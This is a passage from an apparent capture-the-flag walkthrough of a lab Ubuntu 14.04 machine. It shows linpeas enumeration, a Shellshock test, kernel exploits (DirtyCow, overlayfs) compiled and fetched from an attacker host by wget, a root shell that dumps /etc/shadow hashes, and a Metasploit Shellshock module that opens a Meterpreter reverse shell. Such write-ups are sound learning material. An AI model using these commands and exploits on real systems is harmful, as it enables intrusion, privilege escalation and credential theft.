8 2013 /usr/bin/crontab -rwxr-sr-x 1 root shadow 54K Feb 16 2014 /usr/bin/chage -rwxr-sr-x 1 root tty 15K Jun 4 2013 /usr/bin/bsd-write -rwxr-sr-x 1 root ssh 283K Mar 4 2019 /usr/bin/ssh-agent -rwxr-sr-x 1 root mail 15K Dec 6 2013 /usr/bin/dotlockfile -rwxr-sr-x 1 root shadow 23K Feb 16 2014 /usr/bin/expiry -rwxr-sr-x 3 root mail 15K Dec 3 2012 /usr/bin/mail-lock -rwxr-sr-x 3 root mail 15K Dec 3 2012 /usr/bin/mail-touchlock -rwxr-sr-x 1 root tty 19K Jun 3 2014 /usr/bin/wall -rwxr-sr-x 3 root mail 15K Dec 3 2012 /usr/bin/mail-unlock -rwxr-sr-x 1 root mlocate 39K Jun 20 2013 /usr/bin/mlocate -rwsr-sr-x 1 libuuid libuuid 19K Jun 3 2014 /usr/sbin/uuidd -rwxr-sr-x 1 root shadow 35K Jan 31 2014 /sbin/unix_chkpwd ╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d /etc/ld.so.conf.d/libc.conf /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu ╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities Current capabilities: Current: = CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000001fffffffff Shell capabilities: 0x0000000000000000= CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000001fffffffff Files with capabilities (limited to 50): ╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path /usr/bin/gettext.sh ╔══════════╣ Unexpected in root /initrd.img /vmlinuz ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files total 12 drwxr-xr-x 2 root root 4096 Sep 2 2020 . drwxr-xr-x 86 root root 4096 Jan 7 19:10 .. -rw-r--r-- 1 root root 663 Apr 7 2014 bash_completion.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/.secret /root/ ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) ╔══════════╣ Readable files belonging to root and readable by me but not world readable ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /var/log/kern.log ╔══════════╣ Writable log files (logrotten) (limit 100) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation ╔══════════╣ Files inside /home/www-data (limit 20) ╔══════════╣ Files inside others home (limit 20) /home/ryan/.bashrc /home/ryan/.profile /home/ryan/user.txt /home/ryan/.bash_logout ╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup folders ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 128 Sep 2 2020 /var/lib/sgml-base/supercatalog.old -rw-r--r-- 1 root root 198 Sep 2 2020 /var/lib/belocs/hashfile.old -rw-r--r-- 1 root root 8196 Jul 14 2014 /lib/modules/3.13.0-32-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8788 Jul 14 2014 /lib/modules/3.13.0-32-generic/kernel/drivers/power/wm831x_backup.ko -rw-r--r-- 1 root root 1720 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-check.page -rw-r--r-- 1 root root 1291 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-why.page -rw-r--r-- 1 root root 3073 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-thinkabout.page -rw-r--r-- 1 root root 1422 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-restore.page -rw-r--r-- 1 root root 2500 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-what.page -rw-r--r-- 1 root root 2392 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-how.page -rw-r--r-- 1 root root 2018 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-frequency.page -rw-r--r-- 1 root root 2295 Feb 13 2015 /usr/share/help-langpack/en_AU/ubuntu-help/backup-where.page -rw-r--r-- 1 root root 974 Apr 3 2014 /usr/share/help-langpack/en_AU/deja-dup/backup-auto.page -rw-r--r-- 1 root root 755 Apr 3 2014 /usr/share/help-langpack/en_AU/deja-dup/backup-first.page -rw-r--r-- 1 root root 2250 Aug 8 2014 /usr/share/help-langpack/en_GB/evolution/backup-restore.page -rw-r--r-- 1 root root 1720 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-check.page -rw-r--r-- 1 root root 1291 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-why.page -rw-r--r-- 1 root root 3067 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-thinkabout.page -rw-r--r-- 1 root root 1420 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-restore.page -rw-r--r-- 1 root root 2503 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-what.page -rw-r--r-- 1 root root 2371 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-how.page -rw-r--r-- 1 root root 2020 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-frequency.page -rw-r--r-- 1 root root 2289 Feb 13 2015 /usr/share/help-langpack/en_GB/ubuntu-help/backup-where.page -rw-r--r-- 1 root root 974 Apr 3 2014 /usr/share/help-langpack/en_GB/deja-dup/backup-auto.page -rw-r--r-- 1 root root 755 Apr 3 2014 /usr/share/help-langpack/en_GB/deja-dup/backup-first.page -rw-r--r-- 1 root root 1732 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-check.page -rw-r--r-- 1 root root 1298 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-why.page -rw-r--r-- 1 root root 3094 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-thinkabout.page -rw-r--r-- 1 root root 1427 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-restore.page -rw-r--r-- 1 root root 2530 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-what.page -rw-r--r-- 1 root root 2418 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-how.page -rw-r--r-- 1 root root 2034 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-frequency.page -rw-r--r-- 1 root root 2308 Feb 13 2015 /usr/share/help-langpack/en_CA/ubuntu-help/backup-where.page -rw-r--r-- 1 root root 10363 Sep 2 2020 /usr/share/info/dir.old -rw-r--r-- 1 root root 7867 Oct 2 2012 /usr/share/doc/telnet/README.telnet.old.gz -rw-r--r-- 1 root root 27304 Feb 21 2018 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 165622 Jul 14 2014 /usr/src/linux-headers-3.13.0-32-generic/.config.old -rw-r--r-- 1 root root 0 Jul 14 2014 /usr/src/linux-headers-3.13.0-32-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Jul 14 2014 /usr/src/linux-headers-3.13.0-32-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 673 Sep 2 2020 /etc/xml/xml-core.xml.old -rw-r--r-- 1 root root 610 Sep 2 2020 /etc/xml/catalog.old -rw-r--r-- 1 root root 3322 Sep 2 2020 /etc/apt/sources.bak ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /var/lib/mlocate/mlocate.db: regular file, no read permission ╔══════════╣ Web files?(output limit) /var/www/: total 12K drwxr-xr-x 3 root root 4.0K Sep 2 2020 . drwxr-xr-x 12 root root 4.0K Sep 2 2020 .. drwxr-xr-x 10 root root 4.0K Sep 2 2020 html /var/www/html: total 52K drwxr-xr-x 10 root root 4.0K Sep 2 2020 . drwxr-xr-x 3 root root 4.0K Sep 2 2020 .. ╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-r--r-- 1 ryan ryan 220 Sep 2 2020 /home/ryan/.bash_logout -rw-r--r-- 1 root root 0 Jan 7 19:10 /run/network/.ifstate.lock -rw-r--r-- 1 root root 220 Apr 8 2014 /etc/skel/.bash_logout -rw------- 1 root root 0 Jul 22 2014 /etc/.pwd.lock -rw-r--r-- 1 root root 1332 Sep 2 2020 /etc/apparmor.d/cache/.features ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rwxr-xr-x 1 www-data www-data 777018 Jan 7 19:42 /tmp/linpeas.sh -rw-r--r-- 1 root root 1767 Sep 2 2020 /var/www/html/backup/index.html ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files /run/lock /run/lock/apache2 /run/shm /tmp /tmp/.ICE-unix /tmp/.X11-unix /tmp/linpeas.sh /var/cache/apache2/mod_cache_disk /var/tmp ╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files ╔══════════╣ Searching passwords in history files ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/pam.d/common-password /usr/lib/accountsservice/accounts-daemon-pam-password-helper /usr/lib/grub/i386-pc/legacy_password_test.mod /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/pppd/2.4.5/passwordfd.so /usr/share/help-langpack/en_AU/ubuntu-help/user-changepassword.page /usr/share/help-langpack/en_AU/ubuntu-help/user-forgottenpassword.page /usr/share/help-langpack/en_AU/ubuntu-help/user-goodpassword.page /usr/share/help-langpack/en_CA/ubuntu-help/user-changepassword.page /usr/share/help-langpack/en_CA/ubuntu-help/user-forgottenpassword.page /usr/share/help-langpack/en_CA/ubuntu-help/user-goodpassword.page /usr/share/help-langpack/en_GB/empathy/irc-nick-password.page /usr/share/help-langpack/en_GB/evince/password.page /usr/share/help-langpack/en_GB/ubuntu-help/user-changepassword.page /usr/share/help-langpack/en_GB/ubuntu-help/user-forgottenpassword.page /usr/share/help-langpack/en_GB/ubuntu-help/user-goodpassword.page /usr/share/help-langpack/en_GB/zenity/password.page /usr/share/locale-langpack/en_AU/LC_MESSAGES/credentials-control-center.mo /usr/share/locale-langpack/en_AU/LC_MESSAGES/webcredentials_browser_extension.mo /usr/share/locale-langpack/en_CA/LC_MESSAGES/credentials-control-center.mo /usr/share/locale-langpack/en_CA/LC_MESSAGES/webcredentials_browser_extension.mo /usr/share/locale-langpack/en_GB/LC_MESSAGES/credentials-control-center.mo /usr/share/locale-langpack/en_GB/LC_MESSAGES/webcredentials_browser_extension.mo /usr/share/man/man7/credentials.7.gz /usr/share/pam/common-password /usr/share/pam/common-password.md5sums /var/cache/debconf/passwords.dat /var/lib/pam/password ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs ╔══════════╣ Searching passwords inside logs (limit 70) base-passwd depends on libc6 (>= 2.8); however: base-passwd depends on libdebconfclient0 (>= 0.145); however: 2014-07-22 22:48:21 install base-passwd:amd64 <none> 3.5.33 2014-07-22 22:48:21 status half-installed base-passwd:amd64 3.5.33 2014-07-22 22:48:21 status unpacked base-passwd:amd64 3.5.33 2014-07-22 22:48:22 configure base-passwd:amd64 3.5.33 3.5.33 2014-07-22 22:48:22 status half-configured base-passwd:amd64 3.5.33 2014-07-22 22:48:22 status installed base-passwd:amd64 3.5.33 2014-07-22 22:48:22 status unpacked base-passwd:amd64 3.5.33 2014-07-22 22:48:32 status half-configured base-passwd:amd64 3.5.33 2014-07-22 22:48:32 status half-installed base-passwd:amd64 3.5.33 2014-07-22 22:48:32 status unpacked base-passwd:amd64 3.5.33 2014-07-22 22:48:32 upgrade base-passwd:amd64 3.5.33 3.5.33 2014-07-22 22:48:33 status half-installed base-passwd:amd64 3.5.33 2014-07-22 22:48:33 status unpacked base-passwd:amd64 3.5.33 2014-07-22 22:49:24 install passwd:amd64 <none> 1:4.1.5.1-1ubuntu9 2014-07-22 22:49:24 status half-installed passwd:amd64 1:4.1.5.1-1ubuntu9 2014-07-22 22:49:25 status unpacked passwd:amd64 1:4.1.5.1-1ubuntu9 2014-07-22 22:49:43 configure base-passwd:amd64 3.5.33 <none> 2014-07-22 22:49:43 status half-configured base-passwd:amd64 3.5.33 2014-07-22 22:49:43 status unpacked base-passwd:amd64 3.5.33 2014-07-22 22:49:44 status installed base-passwd:amd64 3.5.33 2014-07-22 22:50:03 configure passwd:amd64 1:4.1.5.1-1ubuntu9 <none> 2014-07-22 22:50:03 status half-configured passwd:amd64 1:4.1.5.1-1ubuntu9 2014-07-22 22:50:03 status installed passwd:amd64 1:4.1.5.1-1ubuntu9 2014-07-22 22:50:03 status unpacked passwd:amd64 1:4.1.5.1-1ubuntu9 Description: Set up users and passwords Preparing to unpack .../base-passwd_3.5.33_amd64.deb ... Preparing to unpack .../passwd_1%3a4.1.5.1-1ubuntu9_amd64.deb ... Selecting previously unselected package base-passwd. Selecting previously unselected package passwd. Setting up base-passwd (3.5.33) ... Setting up passwd (1:4.1.5.1-1ubuntu9) ... Shadow passwords are now on. Unpacking base-passwd (3.5.33) ... Unpacking base-passwd (3.5.33) over (3.5.33) ... Unpacking passwd (1:4.1.5.1-1ubuntu9) ... dpkg: base-passwd: dependency problems, but configuring anyway as you requested: dirtycow www-data@ubuntu:/tmp$ x='() { :;}; echo VULNERABLE' bash -c : x='() { :;}; echo VULNERABLE' bash -c : VULNERABLE https://dirtycow.ninja/ https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679 ┌──(kali㉿kali)-[~/0day_ctf] └─$ ls hash id_rsa linpeas.sh turtle.png ┌──(kali㉿kali)-[~/0day_ctf] └─$ nano cowroot.c ┌──(kali㉿kali)-[~/0day_ctf] └─$ gcc cowroot.c -o cowroot -pthread cowroot.c: In function ‘procselfmemThread’: cowroot.c:98:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion] 98 | lseek(f,map,SEEK_SET); | ^~~ | | | void * In file included from cowroot.c:27: /usr/include/unistd.h:339:41: note: expected ‘__off_t’ {aka ‘long int’} but argument is of type ‘void *’ 339 | extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW; | ~~~~~~~~^~~~~~~~ cowroot.c: In function ‘main’: cowroot.c:135:5: warning: implicit declaration of function ‘asprintf’; did you mean ‘vsprintf’? [-Wimplicit-function-declaration] 135 | asprintf(&backup, "cp %s /tmp/bak", suid_binary); | ^~~~~~~~ | vsprintf cowroot.c:139:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration] 139 | fstat(f,&st); | ^~~~~ ┌──(kali㉿kali)-[~/0day_ctf] └─$ ls cowroot cowroot.c hash id_rsa linpeas.sh turtle.png www-data@ubuntu:/tmp$ wget http://10.8.19.103:1337/cowroot wget http://10.8.19.103:1337/cowroot --2023-01-07 20:07:33-- http://10.8.19.103:1337/cowroot Connecting to 10.8.19.103:1337... connected. HTTP request sent, awaiting response... 200 OK Length: 17480 (17K) [application/octet-stream] Saving to: 'cowroot' 100%[======================================>] 17,480 81.3KB/s in 0.2s 2023-01-07 20:07:34 (81.3 KB/s) - 'cowroot' saved [17480/17480] www-data@ubuntu:/tmp$ chmod +x cowroot chmod +x cowroot www-data@ubuntu:/tmp$ ./cowroot ./cowroot ./cowroot: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./cowroot) ./cowroot: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./cowroot) another exploit /home/kali/Downloads/dirtyPipes/dirtypipez.c /home/kali/Downloads/dirtyPipes/exploit1 /home/kali/Downloads/dirtyPipes/exploit2 /home/kali/Downloads/dirtyPipes/poc.c ┌──(kali㉿kali)-[~/0day_ctf] └─$ cp /home/kali/Downloads/dirtyPipes/exploit1 exploit1 ┌──(kali㉿kali)-[~/0day_ctf] └─$ cp /home/kali/Downloads/dirtyPipes/exploit2 exploit2 www-data@ubuntu:/tmp$ wget http://10.8.19.103:1337/exploit1 wget http://10.8.19.103:1337/exploit1 --2023-01-07 20:10:08-- http://10.8.19.103:1337/exploit1 Connecting to 10.8.19.103:1337... connected. HTTP request sent, awaiting response... 200 OK Length: 16872 (16K) [application/octet-stream] Saving to: 'exploit1' 100%[======================================>] 16,872 82.0KB/s in 0.2s 2023-01-07 20:10:09 (82.0 KB/s) - 'exploit1' saved [16872/16872] www-data@ubuntu:/tmp$ chmod +x exploit1 chmod +x exploit1 www-data@ubuntu:/tmp$ ./exploit1 ./exploit1 ./exploit1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit1) www-data@ubuntu:/tmp$ wget http://10.8.19.103:1337/exploit2 wget http://10.8.19.103:1337/exploit2 --2023-01-07 20:10:48-- http://10.8.19.103:1337/exploit2 Connecting to 10.8.19.103:1337... connected. HTTP request sent, awaiting response... 200 OK Length: 17464 (17K) [application/octet-stream] Saving to: 'exploit2' 100%[======================================>] 17,464 83.8KB/s in 0.2s 2023-01-07 20:10:48 (83.8 KB/s) - 'exploit2' saved [17464/17464] www-data@ubuntu:/tmp$ chmod +x exploit2 chmod +x exploit2 www-data@ubuntu:/tmp$ ,/exploit2 ,/exploit2 bash: ,/exploit2: No such file or directory www-data@ubuntu:/tmp$ ./exploit2 ./exploit2 ./exploit2: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit2) ┌──(kali㉿kali)-[~/0day_ctf] └─$ searchsploit Ubuntu 14.04 3.13 Local Privilege Escalation -------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------- --------------------------------- Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (A | linux/local/37293.txt Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3) | linux_x86-64/local/31347.c Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalat | linux/local/47169.c Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt -------------------------------------------------------------------------------------------------------- --------------------------------- https://www.exploit-db.com/exploits/37292 Overlayfs permite tener un árbol de directorios, usualmente de lectura-escritura, que es sobrepuesto sobre otro árbol de directorios de lectura-escritura. Todas las modificaciones van a una capa superior de escritura. Este tipo de mecanismo es mas común de ver en live CDs, pero tiene otra variedad de usos. ┌──(kali㉿kali)-[~/0day_ctf] └─$ gcc 37292.c -o overlayfs 37292.c: In function ‘main’: 37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration] 106 | if(unshare(CLONE_NEWUSER) != 0) | ^~~~~~~ 37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration] 111 | clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); | ^~~~~ | close 37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration] 117 | waitpid(pid, &status, 0); | ^~~~~~~ 37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration] 127 | wait(NULL); | ^~~~ won't work on mine, compile in ubuntu machine if there's a problem www-data@ubuntu:/tmp$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin www-data@ubuntu:/tmp$ wget http://10.8.19.103:1337/37292.c wget http://10.8.19.103:1337/37292.c --2023-01-07 20:18:00-- http://10.8.19.103:1337/37292.c Connecting to 10.8.19.103:1337... connected. HTTP request sent, awaiting response... 200 OK Length: 4968 (4.9K) [text/x-csrc] Saving to: '37292.c' 100%[======================================>] 4,968 --.-K/s in 0.006s 2023-01-07 20:18:01 (776 KB/s) - '37292.c' saved [4968/4968] www-data@ubuntu:/tmp$ gcc 37292.c -o 0day gcc 37292.c -o 0day www-data@ubuntu:/tmp$ chmod +x 0day chmod +x 0day www-data@ubuntu:/tmp$ ./0day ./0day spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # whoami whoami root # cd /root cd /root # ls ls root.txt # cat root.txt cat root.txt THM{g00d_j0b_0day_is_Pleased} # cat /etc/shadow cat /etc/shadow root:$6$vTicVPLT$i80V894gxCAFQnGh32ObHucrOwY0XuMSgfVldxPnViyE1YxAYJlP2TLmnXySwftZFb/MnISvFoeWyeR5xNnBH0:18507:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: games:*:16273:0:99999:7::: man:*:16273:0:99999:7::: lp:*:16273:0:99999:7::: mail:*:16273:0:99999:7::: news:*:16273:0:99999:7::: uucp:*:16273:0:99999:7::: proxy:*:16273:0:99999:7::: www-data:*:16273:0:99999:7::: backup:*:16273:0:99999:7::: list:*:16273:0:99999:7::: irc:*:16273:0:99999:7::: gnats:*:16273:0:99999:7::: nobody:*:16273:0:99999:7::: libuuid:!:16273:0:99999:7::: syslog:*:16273:0:99999:7::: messagebus:*:18507:0:99999:7::: ryan:$6$Aojoc7xT$TXJ/g7.cGgglFGWdSAyFl80ecA86q.1CEdSQ7DxoTyKDL5CtHtvhKQspev8AEN8ouq4dlECL8Bkyf.QjfXx/e.:18507:0:99999:7::: sshd:*:18507:0:99999:7::: # cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin maybe now using metasploit When it comes to Linux we also need to factor in the plethora of distributions available — for a variety of reasons, a kernel exploit that works on the kernel of one distro, may well not work on the same kernel version used in a different distro. This latter problem is obviously largely mitigated on Windows. kernel exploits are incredibly powerful, but should only be used as a method of last resort. Be cautious, be smart, and _always_ review the source code for the exploit thoroughly before compiling and executing the code. ┌──(root㉿kali)-[/home/kali/0day_ctf] └─# msfconsole Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... > access security access: PERMISSION DENIED. > access security grid access: PERMISSION DENIED. > access main security grid access: PERMISSION DENIED....and... YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! =[ metasploit v6.2.33-dev ] + -- --=[ 2275 exploits - 1192 auxiliary - 406 post ] + -- --=[ 951 payloads - 45 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again Metasploit Documentation: https://docs.metasploit.com/ msf6 > search shellshock Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) 1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) 2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner 3 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) 4 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock) 5 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) 6 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) 7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution 8 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) 9 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) 10 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) 11 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec msf6 > use 1 [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD_MAX_LENGTH 2048 yes CMD max line length CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278) HEADER User-Agent yes HTTP header to use METHOD GET yes HTTP method to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo it RPATH /bin yes Target PATH for binaries used by the CmdStager RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mac hine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI yes Path to CGI script TIMEOUT 5 yes HTTP read response timeout (seconds) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.253.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Linux x86 View the full module info with the info, or info -d command. msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.249.163 RHOSTS => 10.10.249.163 msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.8.19.103 LHOST => 10.8.19.103 msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.cgi TARGETURI => /cgi-bin/test.cgi msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run [*] Started reverse TCP handler on 10.8.19.103:4444 [*] Command Stager progress - 100.46% done (1097/1092 bytes) [*] Sending stage (1017704 bytes) to 10.10.249.163 [*] Meterpreter session 1 opened (10.8.19.103:4444 -> 10.10.249.163:42657) at 2023-01-07 23:36:37 -0500 meterpreter 